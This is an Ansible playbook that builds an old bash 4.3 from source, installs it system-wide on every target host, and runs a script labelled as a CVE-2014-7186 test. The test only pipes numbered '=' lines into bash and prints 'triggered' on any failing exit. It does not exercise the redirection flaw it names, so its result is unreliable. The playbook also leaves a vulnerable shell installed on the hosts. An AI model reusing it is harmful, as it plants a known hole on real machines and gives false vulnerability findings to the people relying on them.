---
- name: Replicate CVE-2014-7186
  hosts: all
  become: true
  tasks:
    - name: Update apt cache
      apt:
        update_cache: yes
      become: yes

    - name: Install prerequisites
      apt:
        name: 
          - build-essential
        state: present
      become: yes

    - name: Copy bash-4.3.tar.gz to /tmp directory on the remote server
      copy:
        src: data/bash-4.3.tar.gz
        dest: /tmp/bash-4.3.tar.gz
        mode: '0644'

    - name: Extract Bash source
      unarchive:
        src: /tmp/bash-4.3.tar.gz
        dest: /tmp/
        remote_src: yes
          
    - name: Compile and install vulnerable Bash
      shell: |
        cd /tmp/bash-4.3
        ./configure
        make
        make install

    - name: Verify Bash version
      shell: "/usr/local/bin/bash --version"
      register: bash_version_output

    - name: Display Bash version
      debug:
        msg: "{{ bash_version_output.stdout }}"

    - name: Execute CVE-2014-7186 test case
      shell: |
        cat << 'EOF' > /tmp/cve-2014-7186-test.sh
        #!/bin/bash
        exec 1<> /dev/null
        for i in {1..200} ; do
          printf "=%019d\\n" $i
        done | bash || echo "CVE-2014-7186 triggered"
        EOF
        chmod +x /tmp/cve-2014-7186-test.sh
        /tmp/cve-2014-7186-test.sh
      register: exploit_output

    - name: Display exploit result
      debug:
        msg: "{{ exploit_output.stdout }}"

